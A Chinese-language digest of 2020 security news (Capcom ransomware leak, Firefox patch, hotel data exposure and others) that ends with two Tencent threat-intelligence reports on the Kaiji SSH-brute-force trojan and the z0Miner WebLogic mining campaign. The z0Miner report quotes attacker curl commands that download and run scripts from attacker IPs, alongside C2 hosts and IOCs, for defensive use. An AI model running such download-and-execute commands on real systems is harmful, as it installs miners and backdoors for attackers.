Microsoft Defender Advanced Threat Protection 是微软提供的终端安全平台，可以帮助企业预防、检测、调查和应对高级威胁。微软近日确认，将把网络保护功能带到 MacOS 上（适用于 macOS ver 10.15.4 及更高版本）。 网络保护（Network Protection）有助于减少设备受到网络攻击事件的影响，它可以防止员工使用任何应用程序访问危险的域，这些域可能承载着互联网上的钓鱼诈骗、漏洞和其他恶意内容。网络保护扩大了 Microsoft Defender SmartScreen 的范围，可以阻止所有试图连接到低声誉来源（基于域或主机名）的出站HTTP（s）流量。 网络保护功能将于2020年12月登陆 macOS 平台。       （消息及封面来源：cnBeta）

卡普空在11月4日发布官方公告，称该公司服务器11月2日遭到第三方未授权访问。随后自称为“RAGNAR LOCKER”的黑客组织发布了犯罪声明，表示获取了卡普空超过1TB容量的隐私敏感数据，要求卡普空在日本时间11日上午8点之前与之联系，并达成交易（以比特币形式支付1100万美元）。 而据日媒的最新报道，因为卡普空在11日并未与“RAGNAR LOCKER”进行交易，“RAGNAR LOCKER”已经在“暗网”上公开了卡普空内部信息的一部分（日媒报道为67000MB字节的数据）。目前日本大阪警方已经介入了这起事件，正在进行情报收集工作。 日媒报道称这一次公开的数据主要是公司的销售业绩与薪酬记录，此外还有相关人员的护照及公司内部邮箱等内容。“RAGNAR LOCKER”还发表了“卡普空没有做出正确决定”等声明，他们表示此次公开的数据只是一部分，并威胁“如果想避免数据泄露和巨额诉讼费用等损失，就进行交易”。 卡普空方面在接受采访时解释说:“目前事件还在调查中，还没有确认顾客信息的泄露。关于未授权访问，正在与府警商讨。”       （消息及封面来源：cnBeta）

Ghacks 报道称，Mozilla 已经发布了 Firefox Web 浏览器的最新稳定版本，与 Thunderbird 电子邮件客户端一样修复了一个严重的安全漏洞。首先是 Firefox 82.0.3 和 Firefox 78.4.1 长期支持版（ESR），Mozilla 推荐用户通过“帮助 -> 关于”菜单来手动执行更新检查，或直接下载最新版的安装包。 （截图 via Ghacks） Thunderbird 电子邮件客户端的用户，亦可通过“帮助 -> 关于”菜单来手动执行更新检查，或通过官网下载完整的更新安装包。 由 Firefox 82.0.3 和 Thunderbird 78.4.2 的发行说明可知，本次更新仅仅修复了 CVE-2020-26950 安全漏洞，问题在于未充分考虑 MCallGetProperty 操作码在某些情况下的写入副作用。 据悉，该漏洞是在 2020 年 11 月 7-8 日举办的《2020 天府杯国际网络安全大赛》（中国版的 Pwn2Own 竞赛）期间被披露的。 Mozilla 基金会的 2020-49 安全通报显示，已在新版浏览器和电子邮件客户端中被修复的这个安全问题，属于严重度最高的等级。 作为应对，Mozilla 迅速生成了一个补丁程序，来修复当前所有版本的 Firefox Web 浏览器和 Thunderbird 电子邮件客户端中的安全隐患。 至于 Firefox 的下一个稳定版本，仍定于 2020 年 11 月 17 日发布。       （消息及封面来源：cnBeta）

Office 2010这一标志性的微软办公套件的经典版本从10月起不再受到官方支持，但第三方补丁服务团队0patch表示，它将通过其微补丁帮助用户防范漏洞，继续为Office 2010延长寿命。虽然微补丁一般只会提供给拥有专业或企业订阅的0patch付费客户，但该公司表示，”我们可能偶尔会决定向0patch免费用户提供一些这些微补丁，例如有望帮助减缓全球蠕虫的爆发的时候”。 然而，如果需要保证补丁安装后持续有效，需要确保原来就安装了最新版本的Office 2010以及所有可用的官方更新. 还记得0patch是如何让人们”安全地采用”Windows 7和Server 2008 R2的吗？ 当他们在2020年1月达到支持结束的时候，0patch就已经针对这些系统中的21个高危漏洞发布了微补丁，其中最受欢迎的无疑是针对Zerologon（CVE-2020-1472）的微补丁，这个漏洞几乎影响了所有Windows，目前正被勒索软件团伙广泛利用。 由于Office 2010在上个月已经达到了支持的终点，而且许多组织表示有兴趣保持它的安全，0patch决定也开始设法让人们”安全采用”Office 2010，截止发稿，这项服务已经普遍可用。 这个服务是如何运作的呢？与0patch为 Windows 7 和 Windows Server 2008 R2 所做的工作类似，安全研究人员从各种来源收集 Office 2010 的漏洞信息：合作伙伴、安全社区、公共来源，以及通过测试新发现的影响仍受支持的 Office 版本的漏洞是否也会影响 Office 2010。当安全人员在评估中发现一个高风险的漏洞，并且有足够的数据来重现它时，就会为它创建一个微修补程序，这些程序在完全更新后的Office 2010上运行。就像Windows 7和Server 2008 R2一样。     （消息及封面来源：cnBeta）

在对2020年9月Ryuk黑客网络攻击事件的调查中，我们发现Ryuk黑客使用了获得初始访问权限的新方法：一个名为Buer的恶意软件删除程序。10月，该网络攻击事件演变成更大规模的垃圾邮件活动，并携带Buer及其他类型的恶意软件。 Buer于2019年8月首次推出，它是一种恶意软件服务产品，可用于交付客户所需的软件包，对目标Windows PC进行攻击，并允许恶意活动建立数据阵地。Buer曾与银行木马攻击等恶意软件有所联系，而现在，它显然已经被勒索软件运营商所接受。在许多方面，Buer可以替代Emotet和Trickbot的Bazar装载系统（都使用类似的行为进行部署）。 … 更多内容请至Seebug Paper  阅读全文：https://paper.seebug.org/1393/       消息来源：Sophos，封面来自网络，译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

据外媒报道，西班牙巴塞罗那一家名为Prestige Software的软件公司被发现暴露了全球数百万客户的敏感、隐私和财务数据。尤其是来自Booking.com、Expedia、Agoda、Amadeus、Hotels.com、Hotelbeds、Omnibees、Sabre等几家公司的客户都是此次数据泄露事件的意外受害者。 暴露的数据库最初是由Website Planet的研究人员发现，Prestige Software拥有的一个配置错误的AWS S3 bucket在没有任何安全认证的情况下被开放给公众访问。研究人员分析了该数据库，并得出结论称，它包含了价值24.4GB的数据，总计超过1000万个文件。 值得一提的是，Prestige Software为酒店提供了一个名为Cloud Hospitality的渠道管理平台，用于处理顶级预订网站上的房间供应并实现自动化。在此案中，该软件公司在没有任何安全措施的情况下，存储了旅行社和酒店客户的信用卡数据。结果，客户的个人和财务数据早在2013年就被暴露在网上。 根据Website Planet研究人员Mark Holden编制的报告，被曝光的数据属于酒店客人，包含以下内容： 全名 NIC号码 电子邮件地址 电话号码 酒店预订号 逗留日期和期限 信用卡号码，包括卡主姓名、CVV代码和卡的到期日。 我们没有审查S3 bucket中暴露的所有文件，所以这不是一个完整的列表。每一个连接到云酒店的网站和预订平台可能都受到了影响。这些网站不对因此而暴露的任何数据负责，Holden在报告中表示。 由于Prestige软件公司总部位于欧洲，而暴露的数据属于全球各地的人，包括欧洲公民的公民；该公司应该准备好接受GDPR的巨额罚款和处罚。 至于受影响的客户，目前还不清楚你的数据是否被第三方恶意访问。然而，正如最近所见，网络犯罪分子一直在扫描暴露的数据库，窃取数据并在暗网市场上出售，或在黑客论坛上泄露数据供免费下载。 几个月前曾报道过这样一起案件，4200万伊朗人的个人资料和电话号码被暴露在配置错误的服务器上，并在几天内最终在暗网和黑客论坛上出售。 在另一个案例中，Hackread.com报道称，2019年12月，一个配置错误的数据库暴露了2.67亿Facebook用户的个人信息。2020年4月，同样的数据库在一个黑客论坛上以600美元的价格出售。       （消息来源：cnBeta；封面来自于网络）

雅虎邮箱的受欢迎程度在过去几年里大幅下降，而该服务所卷入的黑客丑闻无疑对其崩溃起到了关键作用。然而，仍然有人在使用雅虎邮箱，而从目前来看，母公司Verizon由于一个奇怪的决定，将让更多的用户离开。这一次，雅虎邮箱将不再允许拥有免费账户的用户将邮件转发到另一个账户。 该公司解释说，只有付费客户才会被提供这样的功能。换句话说，如果你在雅虎邮箱中收到一封邮件，除非你是付费客户，否则你将无法将其转发给其他人。Verizon本周宣布，这一变化将于明年1月1日生效。 如果你的免费雅虎邮箱账户被设置为自动转发邮件到第三方收件箱（如Gmail），那么这些邮件将在2021年1月1日停止传递到第三方地址。你仍然可以通过网页浏览器mail.yahoo.com或通过雅虎邮箱应用查看雅虎邮箱中的邮件。雅虎邮箱专业版用户不会受到这一变化的影响。 不难理解Verizon为何做出这一决定。在雅虎邮箱人气明显下降的情况下，一些只想保留雅虎收件箱的用户将自动转发规则配置到了其他账户上，因此所有到达雅虎邮箱的邮件都会自动转发到另一个邮箱地址。不过，Verizon表示，它之所以要做这件事，是因为安全原因。 Verizon表示：”我们会根据当前的安全标准定期评估我们的产品和服务，并决定删除这一功能，以帮助确保免费的雅虎邮箱账户保持安全。这一改变将帮助我们专注于为雅虎邮箱用户打造最好的新功能和体验。“虽然没有提供具体的细节，但电子邮件转发规则可以被黑客利用，以获得访问权的敏感信息，这一切都在主人不知情的情况下发送。 如果出于某种原因，你想继续使用雅虎邮箱，但仍想转发邮件，现在有两种选择：购买雅虎邮箱专业版或只购买访问+转发套餐，即注册Access + Forwarding。Access + Forwarding将确保用户当前的转发连接无缝延续。用户还将受益于雅虎邮箱的1TB存储空间，这样用户的邮件和附件文件就不会因为长时间不活动而被清除。另外，用户也可以升级到雅虎邮箱专业版。雅虎邮件专业版将从用户雅虎邮件收件箱中删除广告，并为用户提供优先的客户支持，同时允许用户自动转发邮件到第三方账户。 目前有很多其他的电子邮件服务，提供相同的功能，绝对免费，比如Gmail。现在，雅虎邮件专业版每月收费3.49美元，而访问+转发包可以以12美元的年费购买。在Verizon做出这个意外的决定后，有多少用户会转投订阅服务还有待观察，但目前，如果又有一波用户放弃雅虎邮箱，转投众多替代品，外界也不会感到惊讶。       （消息来源：cnBeta；封面来自网络）

尽管臭名昭著的“思路”（Silk Road）网站幕后运营者 Ross Ulbricht 已于 2015 年 2 月 4 日被判处终身监禁，但其被联邦调查局收缴的大约 17.4 万个比特币的价值仍在不断增长。有报道称，这个黑市吸引了将近 15 万买家和 4000 卖家，总共促成了约 1.83 亿美元的灰色交易。当初 Ross Ulbricht 被收缴的比特币价值约 1.05 亿美元，后被美国政府以拍卖的形式转售。 有传闻称，被收缴拍卖的这部分比特币，仅占 Ross Ulbricht 不法所得的一小部分。如果当初思路平台抽取的佣金多达 61.4 万个比特币，那价值约 60 亿美元的另外 44 万个比特币又在哪里？ 近日，Elliptic 联合创始人兼首席科学家 Tom Robinson 博士，在一篇文章中对加密货币的取证、调查、合规性、以及制裁等方面进行了讨论。 由于 Ulbricht 不大可能将这笔流水全部扣在自己手上（比如为了黑市网络的运营而支出的部分款项），其很可能在某些交易所抛出过自己持有的部分比特币。 快进到今天，有一笔将近 10 亿美元（69369 枚比特币）的交易引发了加密货币社区的强烈关注。 可知本次提取的钱包地址为 1HQ3Go3ggs8pFnXuHVHRytPCq5fGG8Hbhx，余额仍在所有钱包中排名第四。 过去一年来，黑客论坛上一直流传着某个加密文件，据说里面包含了某个加密货币钱包的密钥。如果爆料靠谱，那破解者便可顺利挪动这部分加密货币资金。 通过区块链分析，Elliptic 认为这笔资金很可能来自 Silk Road 。因为 2012 年 5 月 6 号的时候，这笔当时价值约 35 万美元的资金曾从 Silk Road 钱包里流出。 在休眠了将近一年之后，这笔资金又于 2013 年 4 月被转移到了 1HQ3 开头的那串加密钱包地址。时至今日，这个钱包都一直保持着安静，除了在 2015 年向 BTC-e 转去了 101 个比特币。 作为一个经常被洗钱者光顾的加密货币交易平台，BTC-e 已于 2017 年被美国执法机构给取缔。现如今，这些比特币的价值已接近 10 亿美元，其动向或表明有黑市卖家在转移资金。 鉴于 Ulbricht 已经锒铛入狱，这些操作显然不是他亲手为之。但无论哪种方式，都意味着有一双幕后黑手在垂涎这部分资金。     （消息及封面来源：cnBeta）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/hacyPAA82rgEBivwOYhuEg   一、概述 腾讯安全威胁情报中心在为客户提供安全巡检服务时，发现腾讯主机安全（云镜）告警SSH爆破入侵事件，遂对事件进行溯源追查，溯源到有疑似国内黑客开发的木马Kaiji通过22端口弱口令爆破入侵服务器。攻击者入侵云主机会下载二进制木马将自身安装到系统启动项进行持久化，并且可根据C2服务器返回的指令进行DDoS攻击。由于响应及时，客户未遭受损失。 腾讯威胁情报中心建议企业用户检查Linux服务器上是否存在以下文件，若存在，建议删除木马文件并将SSH的登陆口令设置为强密码。 /usr/lib/8uc_bt /usr/8uc_bt /boot/8uc_bt /root/8uc_bt.1 /root/8uc_bt /dev/8uc_bt /8uc_bt   腾讯安全系列产品针对Kaiji木马最新变种的响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）Kaiji木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）Kaiji木马相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1)Kaiji木马关联的IOCs已支持识别检测； 2)检测SSH弱口令爆破攻击； 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1)已支持查杀kaiji木马程序； 2)支持检测SSH弱口令爆破攻击； 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1)已支持通过协议检测kaiji木马与服务器的网络通信； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀kaiji木马程序； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 二、详细分析 SSH是 Secure Shell的缩写，由IETF的网络小组（Network Working Group）所制定；SSH为建立在应用层基础上的安全协议。SSH是目前较可靠，专为远程登录会话和其他网络服务提供安全性的协议。云上服务器使用SSH服务的占比较高，而部分用户往往又未对其采取安全的配置，使得SSH监听在默认的22端口且不具备高强度密码、甚至使用空口令，导致黑客可轻易针对服务器22端口进行爆破入侵。Kaiji以root用户为目标，通过SSH暴力破解进行攻击传播。Kaiji通过根用户登陆，可以实现某些自定义网络数据包的DDoS攻击（在Linux中，自定义网络数据包仅提供给特权用户）。建立SSH连接后，会执行bash脚本，下载二进制木马文件8uc_bt并执行。 8uc_bt采用golang编写，执行后会通过修改系统初始化脚本init.d将恶意代码添加到启动项。 然后解密内置的C2服务器地址。     进入Main_doTask循环代码，从C2：a.kaiqingd.com:2323获取命令并执行。 执行的命令包括： DDoS指令； SSH暴力破解指令； 运行shell命令； 替换C2服务器； 删除自身和所有持久化任务。 其中DDoS 攻击类型包括： tcpflood udpflood getflood tapflood tcpddosag synddos 部分执行命令的函数名如下： main_runkshell：通过rc.d和Systemd服务安装持久性； main_runghost：通过/etc/profile.d（/etc/profile.d/linux.sh）安装持久化任务； main_rundingshi（汉字拼音：运行定时）：通过crontab安装持久化任务； main_runshouhu（汉字拼音：运行守护）：调用rootkit，将rootkit复制到/etc/32679并每30秒运行一次； main_Getjiechi、main_Jiechixieru、main_Jiechigo（汉字拼音：劫持写入）：通过劫持系统程序启动木马。 其中“dingshi”、“shouhu”、“jiechi”等汉语拼音字符显示该木马作者疑似来自国内。   IOC Md5 348e35db572ad76271220280c5a64190   C&C a.kaiqingd.com:2323   IP 113.200.151.118 (ZoomEye搜索结果）   参考链接： https://securityaffairs.co/wordpress/102753/malware/kaiji-linux-iot-malware.html https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/cyPZpB4zkSQccViM0292Zg   一、概述 腾讯主机安全（云镜）于2020.11.02日捕获到挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞（CVE-2020-14882/14883）的攻击行动。该团伙通过批量扫描云服务器发现具有Weblogic漏洞的机器，发送精心构造的数据包进行攻击。之后执行远程命令下载shell脚本z0.txt运行，再利用该shell脚本植入门罗币挖矿木马、挖矿任务本地持久化，以及通过爆破SSH横向移动。根据该团伙控制的算力推算，已有大约5000台服务器受害。 由于Weblogic未授权命令执行漏洞（CVE-2020-14882/14883）10月21日才被官方公布，有许多企业未来得及修复，同时该漏洞的补丁存在被绕过的风险。因此该挖矿木马可能对云主机造成较大威胁。 腾讯安全建议企业检查服务器上是否存在文件/tmp/javax/ssd2，检查crontab定时任务中是否存在可疑下载命令，删除挖矿木马文件和相关任务，检查Weblogic是否属于受影响版本并及时采取修复措施。 腾讯安全主机安全（云镜）、云防火墙、漏洞扫描系统、腾讯高级威胁检测系统（御界）均于10月28日升级，支持对该漏洞以及随后的补丁绕过风险进行检测和拦截。Oracle也于11月2日发布新安全更新，以解决CVE-2020-14882补丁被绕过的风险，腾讯安全专家建议用户尽快将Weblogic组件升级到最新版本。   腾讯安全系列产品应对z0Miner挖矿木马家族的响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）z0Miner挖矿木马相关IOCs已入库。各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考： https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）z0Miner挖矿木马相关信息和情报已支持检索。网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考： https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）已支持识别检测z0Miner挖矿木马关联的IOCs； 2）已支持检测和拦截Weblogic未授权命令执行漏洞（CVE-2020-14882/14883） 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀z0Miner相关木马程序； 2）已支持检测Weblogic未授权命令执行漏洞（CVE-2020-14882/14883） 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持检测Weblogic未授权命令执行漏洞（CVE-2020-14882/14883） 关于T-Sec高级威胁检测系统的更多信息，可参考：https://cloud.tencent.com/product/nta 二、详细分析 10月21日，Oracle官方发布数百个组件的高危漏洞公告。其中多个Weblogic组件相关高危漏洞引起业界高度关注。未经授权的攻击者可以绕过WebLogic后台登录等限制，直接远程利用反序列化漏洞，从而接管WebLogic服务器，风险极大。 10月28日，腾讯安全团队关注到互联网上已出现CVE-2020-14882和CVE-2020-14883两个高危漏洞POC（验证代码），未经身份验证的远程攻击者可能通过构造特殊的HTTP GET请求，利用该漏洞在受到攻击的WebLogic Server上执行任意代码。漏洞影响Oracle WebLogic Server的多个版本： 10.3.6.0.0（ZoomEye搜索结果） 12.1.3.0.0（ZoomEye搜索结果） 12.2.1.3.0（ZoomEye搜索结果） 12.2.1.4.0（ZoomEye搜索结果） 14.1.1.0.0（ZoomEye搜索结果）   11月02日腾讯云捕获到挖矿木马z0Miner利用CVE-2020-14882的攻击行为。攻击者精心构造具有CVE-2020-14882漏洞利用代码的数据包后，通过210.108.70.119向目标服务器发送请求。 漏洞攻击成功后在Payload中执行远程代码： curl -fsSL http[:]//218.61.5.109/errors/z0.txt-o /tmp/solrbash /tmp/solr 该代码下载shell脚本z0.txt保存为/tmp/solr并通过bash命令执行。z0.txt首先通过匹配进程和文件名清除竞品挖矿木马。 然后安装crontab定时任务进行持久化，定期下载木马https[:]//pastebin.com/raw/kkMGTEB4以及shell脚本https[:]//pastebin.com/raw/kkMGTEB4到失陷主机上运行，目前该URL返回数据为“exit”，可能在后续攻击中添加恶意代码。 通过SSH远程登陆已经认证过的机器进行横向移动，并在感染后执行远程命令： curl -fsSLhttp[:]//189.7.105.47:8181/examples/jsp/z0.txt | sh 最后下载门罗币挖矿木马javae.exe保存至/tmp/javax/ssd2，通过脚本config.sh启动挖矿。 挖矿木马采用开源挖矿程序XMRig编译，挖矿使用钱包 43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY。 由于该木马刚刚上线，目前挖矿获得收益只有0.1个XMR，但根据其算力133 KH/s推算其已控制约5000台服务器进行挖矿。 IOCs IP 222.108.2.20（ZoomEye搜索结果） 218.61.5.109（ZoomEye搜索结果） 189.7.105.47（ZoomEye搜索结果） 210.108.70.119（ZoomEye搜索结果）   Md5 javae.exe 373b018bef17e04d8ff29472390403f9 z0.txt 48072a4ad46bf20ddd6fdc6a19155c78 z0.txt 067a531e8580fe318ebff0b4038fbe6b config.sh 5020b71e9cd1144c57f39c9d4072201b   URL http[:]//222.108.2.20/about/javae.exe http[:]//218.61.5.109/errors/z0.txt http[:]//218.61.5.109/errors/config.sh http[:]//189.7.105.47:8181/examples/jsp/config.json http[:]//189.7.105.47:8181/examples/jsp/config.sh http[:]//189.7.105.47:8181/examples/jsp/z0.txt https[:]//pastebin.com/raw/qKcPmSNp https[:]//pastebin.com/raw/kkMGTEB4   钱包： 43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY   参考链接： 1.https://mp.weixin.qq.com/s/LIjO2St8PdvXm3lS5wsJPQ 2.https://mp.weixin.qq.com/s/6qsjUMJaUpUQHZYdsB3Ntw 3.https://blog.rapid7.com/2020/10/29/oracle-weblogic-unauthenticated-complete-takeover-cve-2020-14882-what-you-need-to-know/